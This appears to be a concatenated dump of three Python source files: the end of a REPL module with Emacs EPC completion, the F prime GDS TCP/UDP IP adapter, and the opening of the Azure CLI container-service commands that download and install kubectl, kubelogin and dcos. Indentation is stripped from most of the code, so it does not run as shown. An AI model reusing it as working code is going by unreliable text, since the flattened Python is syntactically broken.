line = None
error = e
with self._lock:
self._prompt = None
self._result = (line, error)
self._cond.notify()
def _cancel_line(self):
with self._lock:
self._prompt = None
self._result = (None, KeyboardInterrupt())
self._cond.notify()
if os.environ.get("TERM", "") == 'dumb':
try:
from collections import namedtuple
from epc.client import EPCClient
import sys
except ImportError:
def start_completion_thread(repl, epc_port=None):
# Do nothing when we cannot import the EPC module.
_, _ = repl, epc_port
else:
class EPCCompletionClient(EPCClient):
def __init__(self, address="localhost", port=None, *args, **kargs):
if port is not None:
args = ((address, port),) + args
EPCClient.__init__(self, *args, **kargs)
def complete(*cargs, **ckargs):
return self.complete(*cargs, **ckargs)
self.register_function(complete)
EpcDocument = namedtuple('Document', ['text_before_cursor',])
SYMBOL_CHARS = "._" + string.ascii_letters + string.digits
FIRST_SYMBOL_CHARS = "_" + string.ascii_letters
class ReplEPCCompletion(object):
def __init__(self, repl, *args, **kargs):
_, _ = args, kargs
self._repl = repl
def complete(self, *to_complete):
to_complete = "".join(to_complete)
prefix = ''
if len(to_complete) != 0:
for i, x in enumerate(to_complete[::-1]):
if x not in SYMBOL_CHARS:
while i >= 0 and to_complete[-i] not in FIRST_SYMBOL_CHARS:
i -= 1
prefix, to_complete = to_complete[:-i], to_complete[-i:]
break
pos = len(prefix)
if "." in to_complete:
prefix += to_complete.rsplit(".", 1)[0] + "."
try:
completions = self._repl._completer.get_completions(
EpcDocument(text_before_cursor=to_complete), None)
except Exception as ex:
_ = ex
return tuple()
completions = [
{
"word": prefix + c.text,
"pos": pos,
}
for c in completions
]
return tuple(completions)
class ReplEPCCompletionClient(EPCCompletionClient, ReplEPCCompletion):
def __init__(self, repl, *args, **kargs):
EPCCompletionClient.__init__(self, *args, **kargs)
ReplEPCCompletion.__init__(self, repl)
def start_completion_thread(repl, epc_port=None):
if epc_port is None:
epc_port = os.environ.get("EPC_COMPLETION_SERVER_PORT", None)
rpc_complete_thread = None
if epc_port is not None:
epc_port = int(epc_port)
rpc_complete = ReplEPCCompletionClient(repl, port=epc_port)
rpc_complete_thread = threading.Thread(
target=rpc_complete.connect,
name="PythonModeEPCCompletion",
kwargs={'socket_or_address': ("localhost", epc_port)})
if rpc_complete_thread is not None:
rpc_complete_thread.daemon = True
rpc_complete_thread.start()
return rpc_complete_thread
else:
def start_completion_thread(repl, epc_port=None):
# Do nothing as completion-epc is not needed when not running in Emacs.
_, _ = repl, epc_port
try:
input_impl = raw_input
except NameError:
input_impl = input
def get_input(prompt_string):
return input_impl(prompt_string)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
|
ip.py
|
"""
ip.py:
Module containing a comm-layer adapter for the TCP/UDP/IP stack. This pairs with the F prime component "SocketIpDriver"
in order to read data being sent via TCP or UDP. This is the default adapter used by the system to handle data sent
across a TCP and/or UDP network interface.
@author lestarch
"""
import time
import logging
import socket
import queue
import threading
import fprime_gds.common.adapters.base
import fprime_gds.common.logger
LOGGER = logging.getLogger("ip_adapter")
def check_port(address, port):
"""
Checks a given address and port to ensure that it is available. If not available, a ValueError is raised. Note: this
is done by binding to an address. It does not call "listen"
:param address: address that will bind to
:param port: port to bind to
"""
try:
socket_trial = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_trial.bind((address, port))
except socket.error as err:
raise ValueError("Error with address/port of '{}:{}' : {}".format(address, port, err))
finally:
socket_trial.close()
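# Minimal usage sketch (illustrative; the address and port are placeholders): probe a
# port before constructing the adapter so a configuration error surfaces early.
def _example_check_port():
    try:
        check_port("127.0.0.1", 50000)
    except ValueError as exc:
        LOGGER.warning("Address/port not available: %s", exc)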
class IpAdapter(fprime_gds.common.adapters.base.BaseAdapter):
"""
Adapts IP traffic for use with the GDS ground system. This serves two different "servers" both on the same address
and port, but one uses TCP and the other uses UDP. Writes go to the TCP connection, and reads request data from
both. This data is concatenated and returned up the stack for processing.
"""
KEEPALIVE_INTERVAL = 0.500 # Interval to send a KEEPALIVE packet. None will turn off KEEPALIVE.
KEEPALIVE_DATA = b"sitting well" # Data to send out as part of the KEEPALIVE packet. Should not be null nor empty.
MAXIMUM_DATA_SIZE = 4096
def __init__(self, address, port):
"""
Initialize this adapter by creating a handler for UDP and TCP. A thread for the KEEPALIVE application packets
        will be created if the interval is not None.
"""
self.stop = False
self.keepalive = None
self.tcp = TcpHandler(address, port)
self.udp = UdpHandler(address, port)
self.thtcp = None
self.thudp = None
self.data_chunks = queue.Queue()
self.blob = b""
def open(self):
"""
        Open up the interface to the stored address and port. This will create a TCP and a UDP socket. The TCP socket
        will be bound to the address and listened on for incoming connections.
"""
# Keep alive thread
try:
# Setup the tcp and udp adapter and run a thread to service them
self.thtcp = threading.Thread(target=self.th_handler, args=(self.tcp,))
self.thtcp.start()
self.thudp = threading.Thread(target=self.th_handler, args=(self.udp,))
self.thudp.start()
# Start up a keep-alive ping if desired. This will hit the TCP uplink, and die if the connection is down
if IpAdapter.KEEPALIVE_INTERVAL is not None:
                self.keepalive = threading.Thread(target=self.th_alive, args=[float(self.KEEPALIVE_INTERVAL)])
                self.keepalive.start()
except (ValueError, TypeError) as exc:
LOGGER.error("Failed to start keep-alive thread. {}: {}".format(type(exc).__name__, str(exc)))
def close(self):
"""Close the adapter, by setting the stop flag"""
self.stop = True
self.tcp.stop()
self.udp.stop()
def th_handler(self, handler):
"""Adapter thread function"""
handler.open()
while not self.stop:
self.data_chunks.put(handler.read())
handler.close()
def write(self, frame):
"""
        Send a given framed bit of data by writing it out the TCP interface. It will attempt to reconnect if there
        was a problem previously. This function will return true on success, or false on error.
        :param frame: framed data packet to send out
        :return: True when the data was sent through the TCP handler, False otherwise.
        """
        if self.tcp.connected == IpHandler.CONNECTED:
            return self.tcp.write(frame)
        return False
def read(self):
"""
        Read all data chunks currently queued by the TCP and UDP handlers and return them concatenated. This may
        return less data than will ultimately arrive, but it returns whatever has been received so far.
        :return: data successfully read (b"" when nothing is queued)
"""
data = b""
try:
while not self.data_chunks.empty():
data += self.data_chunks.get_nowait()
except queue.Empty:
pass
return data
def th_alive(self, interval):
"""
        Run this thread to periodically send a KEEPALIVE packet out the TCP connection until the adapter is stopped.
"""
while not self.stop:
self.write(IpAdapter.KEEPALIVE_DATA)
time.sleep(interval)
@classmethod
def get_arguments(cls):
"""
Returns a dictionary of flag to argparse-argument dictionaries for use with argparse to setup arguments.
:return: dictionary of flag to argparse arguments for use with argparse
"""
return {
("--ip-address",): {
"dest":"address",
"type":str,
"default":"0.0.0.0",
"help":"Address of the IP adapter server. Default: %(default)s"
},
("--ip-port",): {
"dest":"port",
"type":int,
"default": 50000,
"help":"Port of the IP adapter server. Default: %(default)s"
}
}
@classmethod
def check_arguments(cls, args):
"""
Code that should check arguments of this adapter. If there is a problem with this code, then a "ValueError"
should be raised describing the problem with these arguments.
:param args: arguments as dictionary
"""
check_port(args["address"], args["port"])
class IpHandler(object):
"""
Base handler for IP types. This will provide the basic methods, and synchronization for reading/writing to multiple
child implementations, namely: UDP and TCP. These child objects can then be instantiated individually.
"""
ERROR_RETRY_INTERVAL = 1 # Seconds between a non-timeout error and a socket reconnection
MAX_CLIENT_BACKLOG = 1 # One client backlog, allowing for reconnects
# Connection states, it will go between these states
CONNECTING = "CONNECTING"
CONNECTED = "CONNECTED"
CLOSED = "CLOSED"
def __init__(self, address, port, type, server=True, logger=logging.getLogger("ip_handler"), post_connect=None):
"""
Initialize this handler. This will set the variables, and start up the internal receive thread.
:param address: address of the handler
:param port: port of the handler
:param type: type of this adapter. socket.SOCK_STREAM or socket.SOCK_DGRAM
"""
self.running = True
self.type = type
self.address = address
self.next_connect = 0
self.port = port
self.socket = None
self.server = server
self.connected = IpHandler.CLOSED
self.logger = logger
self.post_connect = post_connect
def open(self):
"""
Open up this IP type adapter. Returning if already connected.
"""
if self.CONNECTED == self.connected:
return True
# Just continually try and reconnect essentially "blocking" until open. Will only fail if we aborted.
while self.running and self.CONNECTED != self.connected:
try:
# Prevent reconnects when the socket is connected. Socket should be closed on all errors
if self.connected == IpHandler.CLOSED and self.next_connect < time.time():
self.connected = IpHandler.CONNECTING
self.socket = socket.socket(socket.AF_INET, self.type)
if self.server:
self.socket.bind((self.address, self.port))
else:
self.socket.connect((self.address, self.port))
self.open_impl()
self.connected = IpHandler.CONNECTED
self.logger.info("{} connected to {}:{}"
.format("Server" if self.server else "Client", self.address, self.port))
# Post connect handshake
if self.post_connect is not None:
self.write(self.post_connect)
# All errors (timeout included) we should close down the socket, which sets self.connected
except ConnectionAbortedError:
return False
except socket.error as exc:
self.logger.warning("Failed to open socket at {}:{}, retrying: {}: {}"
.format(self.address, self.port, type(exc).__name__, str(exc)))
self.next_connect = time.time() + IpHandler.ERROR_RETRY_INTERVAL
self.close()
return self.connected == self.CONNECTED
def close(self):
"""
Close this specific IP handler. This involves setting connected to False, and closing non-null sockets.
"""
try:
self.close_impl()
IpHandler.kill_socket(self.socket)
finally:
self.socket = None
self.connected = IpHandler.CLOSED
def stop(self):
""" Stop the handler from reconnecting and close"""
self.running = False
self.close()
def read(self):
"""
Reads a single message after ensuring that the socket is fully open. On a non-timeout error, close the socket in
preparation for a reconnect. This internally will call the child's read_impl
:return: data read from TCP server or b"" when nothing is available
"""
# This will block waiting for data
try:
return self.read_impl()
except socket.error as exc:
if self.running:
self.close()
self.logger.warning("Read failure attempting reconnection. {}: {}".format(type(exc).__name__, str(exc)))
self.open()
return b""
def write(self, message):
"""
Writes a single message after ensuring that the socket is fully open. On any error, close the socket in
preparation for a reconnect. This internally will call the child's write_impl
:param message: message to send
:return: True if all data was written, False otherwise
"""
try:
self.write_impl(message)
return True
except socket.error as exc:
if self.running:
self.logger.warning("Write failure: {}".format(type(exc).__name__, str(exc)))
return False
@staticmethod
def kill_socket(sock):
""" Kills a socket connection, but shutting it down and then closing. """
if sock is None:
return
try:
sock.shutdown(socket.SHUT_RDWR)
except OSError:
pass
finally:
sock.close()
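# Sketch of the extension contract described in the IpHandler docstring (illustrative
# only, not used by the GDS): concrete handlers supply the *_impl hooks while the base
# class owns the connect/retry state machine (CLOSED -> CONNECTING -> CONNECTED).
class _ExampleStreamHandler(IpHandler):
    def __init__(self, address, port):
        super(_ExampleStreamHandler, self).__init__(address, port, socket.SOCK_STREAM, server=False)

    def open_impl(self):
        pass  # extra post-connect setup would go here

    def close_impl(self):
        pass  # tear down anything created in open_impl

    def read_impl(self):
        return self.socket.recv(IpAdapter.MAXIMUM_DATA_SIZE)

    def write_impl(self, message):
        self.socket.sendall(message)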
class TcpHandler(IpHandler):
"""
An IpAdapter that allows for interfacing with TCP socket.
"""
def __init__(self, address, port, server=True, logger=logging.getLogger("tcp_handler"), post_connect=None):
"""
Init the TCP adapter with port and address
:param address: address of TCP
:param port: port of TCP
"""
super(TcpHandler, self).__init__(address, port, socket.SOCK_STREAM, server, logger, post_connect)
self.client = None
self.client_address = None
def open_impl(self):
"""
        Open up this particular adapter. When acting as a server, listen for and accept a single client connection;
        when acting as a client, use the already-connected socket directly.
"""
# When a server, must accept and spawn new socket
if self.server:
self.socket.listen(IpHandler.MAX_CLIENT_BACKLOG)
(self.client, self.client_address) = self.socket.accept()
# When a client, use normal socket
else:
self.client = self.socket
def close_impl(self):
"""
Close the TCP socket that was spawned as appropriate.
"""
try:
IpHandler.kill_socket(self.client)
finally:
self.client = None
self.client_address = None
def read_impl(self):
"""
Specific read implementation for the TCP handler. This involves reading from the spawned client socket, not the
primary socket.
"""
data = self.client.recv(IpAdapter.MAXIMUM_DATA_SIZE)
return data
def write_impl(self, message):
"""
Send is implemented with TCP. It will send it to the connected client.
:param message: message to send out
"""
# Block until the port is open
while self.connected != IpHandler.CONNECTED or self.client is None:
pass
self.client.sendall(message)
class UdpHandler(IpHandler):
"""
Handler for UDP traffic. This will work in unison with the TCP adapter.
"""
def __init__(self, address, port, server=True, logger=logging.getLogger("udp_handler")):
"""
Init UDP with address and port
:param address: address of UDP
:param port: port of UDP
"""
super(UdpHandler, self).__init__(address, port, socket.SOCK_DGRAM, server, logger)
def open_impl(self):
"""No extra steps required"""
pass
def close_impl(self):
"""No extra steps required"""
pass
def read_impl(self):
"""
Receive from the UDP handler. This involves receiving from an unconnected socket.
"""
(data, address) = self.socket.recvfrom(IpAdapter.MAXIMUM_DATA_SIZE)
return data
def write_impl(self, message):
"""
Write not implemented with UDP
"""
raise NotImplementedError("UDP Handler cannot send data.")
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from urllib.request import urlopen
from urllib.error import URLError
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.command_modules.acs._helpers import get_snapshot_by_snapshot_id
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError,
AzureInternalError,
FileOperationError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_SCALE_DOWN_MODE_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID, CONST_MONITORING_USING_AAD_MSI_AUTH
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import (CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_SECRET_ROTATION_ENABLED,
CONST_ROTATION_POLL_INTERVAL)
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import DecoratorEarlyExitException
from .addonconfiguration import (
add_monitoring_role_assignment,
add_ingress_appgw_addon_role_assignment,
add_virtual_node_role_assignment,
ensure_default_log_analytics_workspace_for_monitoring,
ensure_container_insights_for_monitoring,
)
from ._resourcegroup import get_rg_location
from ._validators import extract_comma_separated_string
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def get_cmd_test_hook_data(filename):
hook_data = None
curr_dir = os.path.dirname(os.path.realpath(__file__))
test_hook_file_path = os.path.join(curr_dir, 'tests/latest/data', filename)
if os.path.exists(test_hook_file_path):
with open(test_hook_file_path, "r") as f:
hook_data = json.load(f)
return hook_data
def wait_then_open(url):
"""
    Waits for a bit, then opens a URL. Useful for waiting for a proxy to come up before opening the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(
cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError(
'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(
name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(
_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError(
'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError(
            'Unsupported system "{}" for downloading the dcos client.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError(
'Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version,
kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError(
            'Unsupported system "{}" for downloading kubectl.'.format(system))
logger.warning('Downloading client to "%s" from "%s"',
install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
if platform.machine() == 'arm64':
sub_dir, binary_name = 'darwin_arm64', 'kubelogin'
else:
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError(
            'Unsupported system "{}" for downloading kubelogin.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"',
download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode |
stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cmd, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cmd.cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
